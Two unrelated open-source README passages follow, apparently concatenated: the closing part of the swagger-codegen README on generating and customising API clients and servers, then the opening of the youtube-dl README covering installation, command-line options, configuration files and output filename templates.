./bin/android-petstore.sh
./bin/java-petstore.sh
./bin/objc-petstore.sh
```
### Generating libraries from your server
It's just as easy--just use the `-i` flag to point to either a server or file.
### Modifying the client library format
Don't like the default swagger client syntax? Want a different language supported? No problem! Swagger codegen processes mustache templates with the [jmustache](https://github.com/samskivert/jmustache) engine. You can modify our templates or make your own.
You can look at `modules/swagger-codegen/src/main/resources/${your-language}` for examples. To make your own templates, create your own files and use the `-t` flag to specify your template folder. It actually is that easy.
### Making your own codegen modules
If you're starting a project with a new language and don't see what you need, swagger-codegen can help you create a project to generate your own libraries:
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar meta \
-o output/myLibrary -n myClientCodegen -p com.my.company.codegen
```
This will write, in the folder `output/myLibrary`, all the files you need to get started, including a README.md. Once modified and compiled, you can load your library with the codegen and generate clients with your own, custom-rolled logic.
### Where is Javascript???
See our [javascript library](http://github.com/swagger-api/swagger-js)--it's completely dynamic and doesn't require
static code generation.
There is a third-party component called [swagger-js-codegen](https://github.com/wcandillon/swagger-js-codegen) that can generate angularjs or nodejs source code from a swagger specification.
### Generating a client from local files
If you don't want to call your server, you can save the swagger spec files into a directory and pass an argument
to the code generator like this:
```
-i ./modules/swagger-codegen/src/test/resources/2_0/petstore.json
```
Great for creating libraries on your ci server, from the [Swagger Editor](http://editor.swagger.io)... or while coding on an airplane.
### Selective generation
You may not want to generate *all* models in your project. Likewise you may want just one or two apis to be written. If that's the case, you can use system properties to control the output:
The default is generate *everything* supported by the specific library. Once you enable a feature, it will restrict the contents generated:
```
# generate only models
java -Dmodels {opts}
# generate only apis
java -Dapis {opts}
# generate only supporting files
java -DsupportingFiles
# generate models and supporting files
java -Dmodels -DsupportingFiles
```
To control the specific files being generated, you can pass a CSV list of what you want:
```
# generate the User and Pet models only
-Dmodels=User,Pet
# generate the User model and the supportingFile `StringUtil.java`:
-Dmodels=User -DsupportingFiles=StringUtil.java
```
When using selective generation, _only_ the templates needed for the specific generation will be used.
### Customizing the generator
There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc:
```
$ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/
AbstractTypeScriptClientCodegen.java
AkkaScalaClientCodegen.java
AndroidClientCodegen.java
AsyncScalaClientCodegen.java
CSharpClientCodegen.java
CsharpDotNet2ClientCodegen.java
DartClientCodegen.java
FlashClientCodegen.java
JavaClientCodegen.java
JavaInflectorServerCodegen.java
JaxRSServerCodegen.java
NodeJSServerCodegen.java
ObjcClientCodegen.java
PerlClientCodegen.java
PhpClientCodegen.java
PythonClientCodegen.java
Qt5CPPGenerator.java
RubyClientCodegen.java
ScalaClientCodegen.java
ScalatraServerCodegen.java
SilexServerCodegen.java
SinatraServerCodegen.java
SpringMVCServerCodegen.java
StaticDocCodegen.java
StaticHtmlGenerator.java
SwaggerGenerator.java
SwaggerYamlGenerator.java
SwiftCodegen.java
TizenClientCodegen.java
TypeScriptAngularClientCodegen.java
TypeScriptNodeClientCodegen.java
```
Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values.
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java \
-c path/to/config.json
```
Supported config options can be different per language. Running `config-help -l {lang}` will show available options.
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java
```
Output
```
CONFIG OPTIONS
modelPackage
package for generated models
apiPackage
package for generated api classes
sortParamsByRequiredFlag
Sort method arguments to place required parameters before optional parameters. Default: true
invokerPackage
root package for generated code
groupId
groupId in generated pom.xml
artifactId
artifactId in generated pom.xml
artifactVersion
artifact version in generated pom.xml
sourceFolder
source folder for generated code
localVariablePrefix
prefix for generated code members and local variables
serializableModel
boolean - toggle "implements Serializable" for generated models
library
library template (sub-template) to use:
<default> - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2
jersey2 - HTTP client: Jersey client 2.6
okhttp-gson - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1
retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0)
retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2)
```
Your config file for java can look like
```
{
"groupId":"com.my.company",
"artifactId":"MyClent",
"artifactVersion":"1.2.0"
}
```
For all the unspecified options default values will be used.
Another way to override default options is to extend the config class for the specific language.
To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java:
```
package com.mycompany.swagger.codegen;
import io.swagger.codegen.languages.*;
public class MyObjcCodegen extends ObjcClientCodegen {
static {
PREFIX = "HELO";
}
}
```
and specify the `classname` when running the generator:
```
-l com.mycompany.swagger.codegen.MyObjcCodegen
```
Your subclass will now be loaded and overrides the `PREFIX` value in the superclass.
### Validating your swagger spec
You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example:
http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json
### Generating dynamic html api documentation
To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation:
```
cd samples/dynamic-html/
npm install
node .
```
Which launches a node.js server so the AJAX calls have a place to go.
### Generating static html api documentation
To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem:
```
cd samples/html/
open index.html
```
### To build a server stub
You can also use the codegen to generate a server for a couple different frameworks. Take a look here:
### Node.js
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l nodejs \
-o samples/server/petstore/nodejs
```
### PHP Silex
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l silex \
-o samples/server/petstore/silex
```
### Ruby Sinatra
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l sinatra \
-o samples/server/petstore/sinatra
```
### Scala Scalatra
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l scalatra \
-o samples/server/petstore/scalatra
```
### Java JAX-RS
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l jaxrs \
-o samples/server/petstore/jaxrs
```
### Java Spring MVC
```
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l spring-mvc \
-o samples/server/petstore/spring-mvc
```
### To build the codegen library
This will create the swagger-codegen library from source.
```
mvn package
```
Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts
## Online generators
One can also generate API client or server using the online generators (https://generator.swagger.io)
For example, to generate Ruby API client, simply send the following HTTP request using curl:
```
curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby
```
Then you will receieve a JSON response with the URL to download the zipped code.
Guidelines for Contribution
---------------------------
Please refer to this [page](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution)
License
-------
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
|
[![Build Status](https://travis-ci.org/rg3/youtube-dl.svg?branch=master)](https://travis-ci.org/rg3/youtube-dl)
youtube-dl - download videos from youtube.com or other video platforms
- [INSTALLATION](#installation)
- [DESCRIPTION](#description)
- [OPTIONS](#options)
- [CONFIGURATION](#configuration)
- [OUTPUT TEMPLATE](#output-template)
- [FORMAT SELECTION](#format-selection)
- [VIDEO SELECTION](#video-selection)
- [FAQ](#faq)
- [DEVELOPER INSTRUCTIONS](#developer-instructions)
- [EMBEDDING YOUTUBE-DL](#embedding-youtube-dl)
- [BUGS](#bugs)
- [COPYRIGHT](#copyright)
# INSTALLATION
To install it right away for all UNIX users (Linux, OS X, etc.), type:
sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl
sudo chmod a+rx /usr/local/bin/youtube-dl
If you do not have curl, you can alternatively use a recent wget:
sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl
sudo chmod a+rx /usr/local/bin/youtube-dl
Windows users can [download an .exe file](https://yt-dl.org/latest/youtube-dl.exe) and place it in any location on their [PATH](https://en.wikipedia.org/wiki/PATH_%28variable%29) except for `%SYSTEMROOT%\System32` (e.g. **do not** put in `C:\Windows\System32`).
You can also use pip:
sudo -H pip install --upgrade youtube-dl
This command will update youtube-dl if you have already installed it. See the [pypi page](https://pypi.python.org/pypi/youtube_dl) for more information.
OS X users can install youtube-dl with [Homebrew](https://brew.sh/):
brew install youtube-dl
Or with [MacPorts](https://www.macports.org/):
sudo port install youtube-dl
Alternatively, refer to the [developer instructions](#developer-instructions) for how to check out and work with the git repository. For further options, including PGP signatures, see the [youtube-dl Download Page](https://rg3.github.io/youtube-dl/download.html).
# DESCRIPTION
**youtube-dl** is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on macOS. It is released to the public domain, which means you can modify it, redistribute it or use it however you like.
youtube-dl [OPTIONS] URL [URL...]
# OPTIONS
-h, --help Print this help text and exit
--version Print program version and exit
-U, --update Update this program to latest version. Make
sure that you have sufficient permissions
(run with sudo if needed)
-i, --ignore-errors Continue on download errors, for example to
skip unavailable videos in a playlist
--abort-on-error Abort downloading of further videos (in the
playlist or the command line) if an error
occurs
--dump-user-agent Display the current browser identification
--list-extractors List all supported extractors
--extractor-descriptions Output descriptions of all supported
extractors
--force-generic-extractor Force extraction to use the generic
extractor
--default-search PREFIX Use this prefix for unqualified URLs. For
example "gvsearch2:" downloads two videos
from google videos for youtube-dl "large
apple". Use the value "auto" to let
youtube-dl guess ("auto_warning" to emit a
warning when guessing). "error" just throws
an error. The default value "fixup_error"
repairs broken URLs, but emits an error if
this is not possible instead of searching.
--ignore-config Do not read configuration files. When given
in the global configuration file
/etc/youtube-dl.conf: Do not read the user
configuration in ~/.config/youtube-
dl/config (%APPDATA%/youtube-dl/config.txt
on Windows)
--config-location PATH Location of the configuration file; either
the path to the config or its containing
directory.
--flat-playlist Do not extract the videos of a playlist,
only list them.
--mark-watched Mark videos watched (YouTube only)
--no-mark-watched Do not mark videos watched (YouTube only)
--no-color Do not emit color codes in output
## Network Options:
--proxy URL Use the specified HTTP/HTTPS/SOCKS proxy.
To enable SOCKS proxy, specify a proper
scheme. For example
socks5://127.0.0.1:1080/. Pass in an empty
string (--proxy "") for direct connection
--socket-timeout SECONDS Time to wait before giving up, in seconds
--source-address IP Client-side IP address to bind to
-4, --force-ipv4 Make all connections via IPv4
-6, --force-ipv6 Make all connections via IPv6
## Geo Restriction:
--geo-verification-proxy URL Use this proxy to verify the IP address for
some geo-restricted sites. The default
proxy specified by --proxy (or none, if the
option is not present) is used for the
actual downloading.
--geo-bypass Bypass geographic restriction via faking
X-Forwarded-For HTTP header
--no-geo-bypass Do not bypass geographic restriction via
faking X-Forwarded-For HTTP header
--geo-bypass-country CODE Force bypass geographic restriction with
explicitly provided two-letter ISO 3166-2
country code
--geo-bypass-ip-block IP_BLOCK Force bypass geographic restriction with
explicitly provided IP block in CIDR
notation
## Video Selection:
--playlist-start NUMBER Playlist video to start at (default is 1)
--playlist-end NUMBER Playlist video to end at (default is last)
--playlist-items ITEM_SPEC Playlist video items to download. Specify
indices of the videos in the playlist
separated by commas like: "--playlist-items
1,2,5,8" if you want to download videos
indexed 1, 2, 5, 8 in the playlist. You can
specify range: "--playlist-items
1-3,7,10-13", it will download the videos
at index 1, 2, 3, 7, 10, 11, 12 and 13.
--match-title REGEX Download only matching titles (regex or
caseless sub-string)
--reject-title REGEX Skip download for matching titles (regex or
caseless sub-string)
--max-downloads NUMBER Abort after downloading NUMBER files
--min-filesize SIZE Do not download any videos smaller than
SIZE (e.g. 50k or 44.6m)
--max-filesize SIZE Do not download any videos larger than SIZE
(e.g. 50k or 44.6m)
--date DATE Download only videos uploaded in this date
--datebefore DATE Download only videos uploaded on or before
this date (i.e. inclusive)
--dateafter DATE Download only videos uploaded on or after
this date (i.e. inclusive)
--min-views COUNT Do not download any videos with less than
COUNT views
--max-views COUNT Do not download any videos with more than
COUNT views
--match-filter FILTER Generic video filter. Specify any key (see
the "OUTPUT TEMPLATE" for a list of
available keys) to match if the key is
present, !key to check if the key is not
present, key > NUMBER (like "comment_count
> 12", also works with >=, <, <=, !=, =) to
compare against a number, key = 'LITERAL'
(like "uploader = 'Mike Smith'", also works
with !=) to match against a string literal
and & to require multiple matches. Values
which are not known are excluded unless you
put a question mark (?) after the operator.
For example, to only match videos that have
been liked more than 100 times and disliked
less than 50 times (or the dislike
functionality is not available at the given
service), but who also have a description,
use --match-filter "like_count > 100 &
dislike_count <? 50 & description" .
--no-playlist Download only the video, if the URL refers
to a video and a playlist.
--yes-playlist Download the playlist, if the URL refers to
a video and a playlist.
--age-limit YEARS Download only videos suitable for the given
age
--download-archive FILE Download only videos not listed in the
archive file. Record the IDs of all
downloaded videos in it.
--include-ads Download advertisements as well
(experimental)
## Download Options:
-r, --limit-rate RATE Maximum download rate in bytes per second
(e.g. 50K or 4.2M)
-R, --retries RETRIES Number of retries (default is 10), or
"infinite".
--fragment-retries RETRIES Number of retries for a fragment (default
is 10), or "infinite" (DASH, hlsnative and
ISM)
--skip-unavailable-fragments Skip unavailable fragments (DASH, hlsnative
and ISM)
--abort-on-unavailable-fragment Abort downloading when some fragment is not
available
--keep-fragments Keep downloaded fragments on disk after
downloading is finished; fragments are
erased by default
--buffer-size SIZE Size of download buffer (e.g. 1024 or 16K)
(default is 1024)
--no-resize-buffer Do not automatically adjust the buffer
size. By default, the buffer size is
automatically resized from an initial value
of SIZE.
--http-chunk-size SIZE Size of a chunk for chunk-based HTTP
downloading (e.g. 10485760 or 10M) (default
is disabled). May be useful for bypassing
bandwidth throttling imposed by a webserver
(experimental)
--playlist-reverse Download playlist videos in reverse order
--playlist-random Download playlist videos in random order
--xattr-set-filesize Set file xattribute ytdl.filesize with
expected file size
--hls-prefer-native Use the native HLS downloader instead of
ffmpeg
--hls-prefer-ffmpeg Use ffmpeg instead of the native HLS
downloader
--hls-use-mpegts Use the mpegts container for HLS videos,
allowing to play the video while
downloading (some players may not be able
to play it)
--external-downloader COMMAND Use the specified external downloader.
Currently supports
aria2c,avconv,axel,curl,ffmpeg,httpie,wget
--external-downloader-args ARGS Give these arguments to the external
downloader
## Filesystem Options:
-a, --batch-file FILE File containing URLs to download ('-' for
stdin), one URL per line. Lines starting
with '#', ';' or ']' are considered as
comments and ignored.
--id Use only video ID in file name
-o, --output TEMPLATE Output filename template, see the "OUTPUT
TEMPLATE" for all the info
--autonumber-start NUMBER Specify the start value for %(autonumber)s
(default is 1)
--restrict-filenames Restrict filenames to only ASCII
characters, and avoid "&" and spaces in
filenames
-w, --no-overwrites Do not overwrite files
-c, --continue Force resume of partially downloaded files.
By default, youtube-dl will resume
downloads if possible.
--no-continue Do not resume partially downloaded files
(restart from beginning)
--no-part Do not use .part files - write directly
into output file
--no-mtime Do not use the Last-modified header to set
the file modification time
--write-description Write video description to a .description
file
--write-info-json Write video metadata to a .info.json file
--write-annotations Write video annotations to a
.annotations.xml file
--load-info-json FILE JSON file containing the video information
(created with the "--write-info-json"
option)
--cookies FILE File to read cookies from and dump cookie
jar in
--cache-dir DIR Location in the filesystem where youtube-dl
can store some downloaded information
permanently. By default
$XDG_CACHE_HOME/youtube-dl or
~/.cache/youtube-dl . At the moment, only
YouTube player files (for videos with
obfuscated signatures) are cached, but that
may change.
--no-cache-dir Disable filesystem caching
--rm-cache-dir Delete all filesystem cache files
## Thumbnail images:
--write-thumbnail Write thumbnail image to disk
--write-all-thumbnails Write all thumbnail image formats to disk
--list-thumbnails Simulate and list all available thumbnail
formats
## Verbosity / Simulation Options:
-q, --quiet Activate quiet mode
--no-warnings Ignore warnings
-s, --simulate Do not download the video and do not write
anything to disk
--skip-download Do not download the video
-g, --get-url Simulate, quiet but print URL
-e, --get-title Simulate, quiet but print title
--get-id Simulate, quiet but print id
--get-thumbnail Simulate, quiet but print thumbnail URL
--get-description Simulate, quiet but print video description
--get-duration Simulate, quiet but print video length
--get-filename Simulate, quiet but print output filename
--get-format Simulate, quiet but print output format
-j, --dump-json Simulate, quiet but print JSON information.
See the "OUTPUT TEMPLATE" for a description
of available keys.
-J, --dump-single-json Simulate, quiet but print JSON information
for each command-line argument. If the URL
refers to a playlist, dump the whole
playlist information in a single line.
--print-json Be quiet and print the video information as
JSON (video is still being downloaded).
--newline Output progress bar as new lines
--no-progress Do not print progress bar
--console-title Display progress in console titlebar
-v, --verbose Print various debugging information
--dump-pages Print downloaded pages encoded using base64
to debug problems (very verbose)
--write-pages Write downloaded intermediary pages to
files in the current directory to debug
problems
--print-traffic Display sent and read HTTP traffic
-C, --call-home Contact the youtube-dl server for debugging
--no-call-home Do NOT contact the youtube-dl server for
debugging
## Workarounds:
--encoding ENCODING Force the specified encoding (experimental)
--no-check-certificate Suppress HTTPS certificate validation
--prefer-insecure Use an unencrypted connection to retrieve
information about the video. (Currently
supported only for YouTube)
--user-agent UA Specify a custom user agent
--referer URL Specify a custom referer, use if the video
access is restricted to one domain
--add-header FIELD:VALUE Specify a custom HTTP header and its value,
separated by a colon ':'. You can use this
option multiple times
--bidi-workaround Work around terminals that lack
bidirectional text support. Requires bidiv
or fribidi executable in PATH
--sleep-interval SECONDS Number of seconds to sleep before each
download when used alone or a lower bound
of a range for randomized sleep before each
download (minimum possible number of
seconds to sleep) when used along with
--max-sleep-interval.
--max-sleep-interval SECONDS Upper bound of a range for randomized sleep
before each download (maximum possible
number of seconds to sleep). Must only be
used along with --min-sleep-interval.
## Video Format Options:
-f, --format FORMAT Video format code, see the "FORMAT
SELECTION" for all the info
--all-formats Download all available video formats
--prefer-free-formats Prefer free video formats unless a specific
one is requested
-F, --list-formats List all available formats of requested
videos
--youtube-skip-dash-manifest Do not download the DASH manifests and
related data on YouTube videos
--merge-output-format FORMAT If a merge is required (e.g.
bestvideo+bestaudio), output to given
container format. One of mkv, mp4, ogg,
webm, flv. Ignored if no merge is required
## Subtitle Options:
--write-sub Write subtitle file
--write-auto-sub Write automatically generated subtitle file
(YouTube only)
--all-subs Download all the available subtitles of the
video
--list-subs List all available subtitles for the video
--sub-format FORMAT Subtitle format, accepts formats
preference, for example: "srt" or
"ass/srt/best"
--sub-lang LANGS Languages of the subtitles to download
(optional) separated by commas, use --list-
subs for available language tags
## Authentication Options:
-u, --username USERNAME Login with this account ID
-p, --password PASSWORD Account password. If this option is left
out, youtube-dl will ask interactively.
-2, --twofactor TWOFACTOR Two-factor authentication code
-n, --netrc Use .netrc authentication data
--video-password PASSWORD Video password (vimeo, smotri, youku)
## Adobe Pass Options:
--ap-mso MSO Adobe Pass multiple-system operator (TV
provider) identifier, use --ap-list-mso for
a list of available MSOs
--ap-username USERNAME Multiple-system operator account login
--ap-password PASSWORD Multiple-system operator account password.
If this option is left out, youtube-dl will
ask interactively.
--ap-list-mso List all supported multiple-system
operators
## Post-processing Options:
-x, --extract-audio Convert video files to audio-only files
(requires ffmpeg or avconv and ffprobe or
avprobe)
--audio-format FORMAT Specify audio format: "best", "aac",
"flac", "mp3", "m4a", "opus", "vorbis", or
"wav"; "best" by default; No effect without
-x
--audio-quality QUALITY Specify ffmpeg/avconv audio quality, insert
a value between 0 (better) and 9 (worse)
for VBR or a specific bitrate like 128K
(default 5)
--recode-video FORMAT Encode the video to another format if
necessary (currently supported:
mp4|flv|ogg|webm|mkv|avi)
--postprocessor-args ARGS Give these arguments to the postprocessor
-k, --keep-video Keep the video file on disk after the post-
processing; the video is erased by default
--no-post-overwrites Do not overwrite post-processed files; the
post-processed files are overwritten by
default
--embed-subs Embed subtitles in the video (only for mp4,
webm and mkv videos)
--embed-thumbnail Embed thumbnail in the audio as cover art
--add-metadata Write metadata to the video file
--metadata-from-title FORMAT Parse additional metadata like song title /
artist from the video title. The format
syntax is the same as --output. Regular
expression with named capture groups may
also be used. The parsed parameters replace
existing values. Example: --metadata-from-
title "%(artist)s - %(title)s" matches a
title like "Coldplay - Paradise". Example
(regex): --metadata-from-title
"(?P<artist>.+?) - (?P<title>.+)"
--xattrs Write metadata to the video file's xattrs
(using dublin core and xdg standards)
--fixup POLICY Automatically correct known faults of the
file. One of never (do nothing), warn (only
emit a warning), detect_or_warn (the
default; fix file if we can, warn
otherwise)
--prefer-avconv Prefer avconv over ffmpeg for running the
postprocessors (default)
--prefer-ffmpeg Prefer ffmpeg over avconv for running the
postprocessors
--ffmpeg-location PATH Location of the ffmpeg/avconv binary;
either the path to the binary or its
containing directory.
--exec CMD Execute a command on the file after
downloading, similar to find's -exec
syntax. Example: --exec 'adb push {}
/sdcard/Music/ && rm {}'
--convert-subs FORMAT Convert the subtitles to other format
(currently supported: srt|ass|vtt|lrc)
# CONFIGURATION
You can configure youtube-dl by placing any supported command line option to a configuration file. On Linux and OS X, the system wide configuration file is located at `/etc/youtube-dl.conf` and the user wide configuration file at `~/.config/youtube-dl/config`. On Windows, the user wide configuration file locations are `%APPDATA%\youtube-dl\config.txt` or `C:\Users\<user name>\youtube-dl.conf`. Note that by default configuration file may not exist so you may need to create it yourself.
For example, with the following configuration file youtube-dl will always extract the audio, not copy the mtime, use a proxy and save all videos under `Movies` directory in your home directory:
```
# Lines starting with # are comments
# Always extract audio
-x
# Do not copy the mtime
--no-mtime
# Use this proxy
--proxy 127.0.0.1:3128
# Save all videos under Movies directory in your home directory
-o ~/Movies/%(title)s.%(ext)s
```
Note that options in configuration file are just the same options aka switches used in regular command line calls thus there **must be no whitespace** after `-` or `--`, e.g. `-o` or `--proxy` but not `- o` or `-- proxy`.
You can use `--ignore-config` if you want to disable the configuration file for a particular youtube-dl run.
You can also use `--config-location` if you want to use custom configuration file for a particular youtube-dl run.
### Authentication with `.netrc` file
You may also want to configure automatic credentials storage for extractors that support authentication (by providing login and password with `--username` and `--password`) in order not to pass credentials as command line arguments on every youtube-dl execution and prevent tracking plain text passwords in the shell command history. You can achieve this using a [`.netrc` file](https://stackoverflow.com/tags/.netrc/info) on a per extractor basis. For that you will need to create a `.netrc` file in your `$HOME` and restrict permissions to read/write by only you:
```
touch $HOME/.netrc
chmod a-rwx,u+rw $HOME/.netrc
```
After that you can add credentials for an extractor in the following format, where *extractor* is the name of the extractor in lowercase:
```
machine <extractor> login <login> password <password>
```
For example:
```
machine youtube login [email protected] password my_youtube_password
machine twitch login my_twitch_account_name password my_twitch_password
```
To activate authentication with the `.netrc` file you should pass `--netrc` to youtube-dl or place it in the [configuration file](#configuration).
On Windows you may also need to setup the `%HOME%` environment variable manually. For example:
```
set HOME=%USERPROFILE%
```
# OUTPUT TEMPLATE
The `-o` option allows users to indicate a template for the output file names.
**tl;dr:** [navigate me to examples](#output-template-examples).
The basic usage is not to set any template arguments when downloading a single file, like in `youtube-dl -o funny_video.flv "https://some/video"`. However, it may contain special sequences that will be replaced when downloading each video. The special sequences may be formatted according to [python string formatting operations](https://docs.python.org/2/library/stdtypes.html#string-formatting). For example, `%(NAME)s` or `%(NAME)05d`. To clarify, that is a percent symbol followed by a name in parentheses, followed by a formatting operations. Allowed names along with sequence type are:
- `id` (string): Video identifier
- `title` (string): Video title
- `url` (string): Video URL
- `ext` (string): Video filename extension
- `alt_title` (string): A secondary title of the video
- `display_id` (string): An alternative identifier for the video
- `uploader` (string): Full name of the video uploader
- `license` (string): License name the video is licensed under
- `creator` (string): The creator of the video
- `release_date` (string): The date (YYYYMMDD) when the video was released
- `timestamp` (numeric): UNIX timestamp of the moment the video became available
- `upload_date` (string): Video upload date (YYYYMMDD)
- `uploader_id` (string): Nickname or id of the video uploader
- `location` (string): Physical location where the video was filmed
- `duration` (numeric): Length of the video in seconds
- `view_count` (numeric): How many users have watched the video on the platform
- `like_count` (numeric): Number of positive ratings of the video
- `dislike_count` (numeric): Number of negative ratings of the video
- `repost_count` (numeric): Number of reposts of the video
- `average_rating` (numeric): Average rating give by users, the scale used depends on the webpage
- `comment_count` (numeric): Number of comments on the video
- `age_limit` (numeric): Age restriction for the video (years)
- `is_live` (boolean): Whether this video is a live stream or a fixed-length video
- `start_time` (numeric): Time in seconds where the reproduction should start, as specified in the URL
- `end_time` (numeric): Time in seconds where the reproduction should end, as specified in the URL
- `format` (string): A human-readable description of the format
- `format_id` (string): Format code specified by `--format`
- `format_note` (string): Additional info about the format
- `width` (numeric): Width of the video
- `height` (numeric): Height of the video
- `resolution` (string): Textual description of width and height
- `tbr` (numeric): Average bitrate of audio and video in KBit/s
- `abr` (numeric): Average audio bitrate in KBit/s
- `acodec` (string): Name of the audio codec in use
- `asr` (numeric): Audio sampling rate in Hertz
- `vbr` (numeric): Average video bitrate in KBit/s
- `fps` (numeric): Frame rate
- `vcodec` (string): Name of the video codec in use
- `container` (string): Name of the container format
- `filesize` (numeric): The number of bytes, if known in advance
- `filesize_approx` (numeric): An estimate for the number of bytes
- `protocol` (string): The protocol that will be used for the actual download
- `extractor` (string): Name of the extractor
- `extractor_key` (string): Key name of the extractor
- `epoch` (numeric): Unix epoch when creating the file
- `autonumber` (numeric): Five-digit number that will be increased with each download, starting at zero
- `playlist` (string): Name or id of the playlist that contains the video
- `playlist_index` (numeric): Index of the video in the playlist padded with leading zeros according to the total length of the playlist
- `playlist_id` (string): Playlist identifier
- `playlist_title` (string): Playlist title
- `playlist_uploader` (string): Full name of the playlist uploader
- `playlist_uploader_id` (string): Nickname or id of the playlist uploader
Available for the video that belongs to some logical chapter or section:
- `chapter` (string): Name or title of the chapter the video belongs to
- `chapter_number` (numeric): Number of the chapter the video belongs to
- `chapter_id` (string): Id of the chapter the video belongs to
Available for the video that is an episode of some series or programme:
- `series` (string): Title of the series or programme the video episode belongs to
- `season` (string): Title of the season the video episode belongs to
- `season_number` (numeric): Number of the season the video episode belongs to
- `season_id` (string): Id of the season the video episode belongs to
- `episode` (string): Title of the video episode
- `episode_number` (numeric): Number of the video episode within a season
- `episode_id` (string): Id of the video episode
Available for the media that is a track or a part of a music album:
- `track` (string): Title of the track
- `track_number` (numeric): Number of the track within an album or a disc
- `track_id` (string): Id of the track
- `artist` (string): Artist(s) of the track
- `genre` (string): Genre(s) of the track
- `album` (string): Title of the album the track belongs to
- `album_type` (string): Type of the album
- `album_artist` (string): List of all artists appeared on the album
- `disc_number` (numeric): Number of the disc or other physical medium the track belongs to
- `release_year` (numeric): Year (YYYY) when the album was released
Each aforementioned sequence when referenced in an output template will be replaced by the actual value corresponding to the sequence name. Note that some of the sequences are not guaranteed to be present since they depend on the metadata obtained by a particular extractor. Such sequences will be replaced with `NA`.
For example for `-o %(title)s-%(id)s.%(ext)s` and an mp4 video with title `youtube-dl test video` and id `BaW_jenozKcj`, this will result in a `youtube-dl test video-BaW_jenozKcj.mp4` file created in the current directory.
For numeric sequences you can use numeric related formatting, for example, `%(view_count)05d` will result in a string with view count padded with zeros up to 5 characters, like in `00042`.
Output templates can also contain arbitrary hierarchical path, e.g. `-o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s'` which will result in downloading each video in a directory corresponding to this path template. Any missing directory will be automatically created for you.
To use percent literals in an output template use `%%`. To output to stdout use `-o -`.
The current default template is `%(title)s-%(id)s.%(ext)s`.
In some cases, you don't want special characters such as 中, spaces, or &, such as when transferring the downloaded filename to a Windows system or the filename through an 8bit-unsafe channel. In these cases, add the `--restrict-filenames` flag to get a shorter title:
#### Output template and Windows batch files
If you are using an output template inside a Windows batch file then you must escape plain percent characters (`%`) by doubling, so that `-o "%(title)s-%(id)s.%(ext)s"` should become `-o "%%(title)s-%%(id)s.%%(ext)s"`. However you should not touch `%`'s that are not plain characters, e.g. environment variables for expansion should stay intact: `-o "C:\%HOMEPATH%\Desktop\%%(title)s.%%(ext)s"`.
#### Output template examples
Note that on Windows you may need to use double quotes instead of single.
```bash
$ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc
youtube-dl test video ''_ä↭𝕐.mp4 # All kinds of weird characters
$ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc --restrict-filenames
youtube-dl_test_video_.mp4 # A simple file name
# Download YouTube playlist videos in separate directory indexed by video order in a playlist
$ youtube-dl -o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re
# Download all playlists of YouTube channel/user keeping each playlist in separate directory:
$ youtube-dl -o '%(uploader)s/%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/user/TheLinuxFoundation/playlists
# Download Udemy course keeping each chapter in separate directory under MyVideos directory in your home
$ youtube-dl -u user -p password -o '~/MyVideos/%(playlist)s/%(chapter_number)s - %(chapter)s/%(title)s.%(ext)s' https://www.udemy.com/java-tutorial/
# Download entire series season keeping each series and each season in separate directory under C:/MyVideos
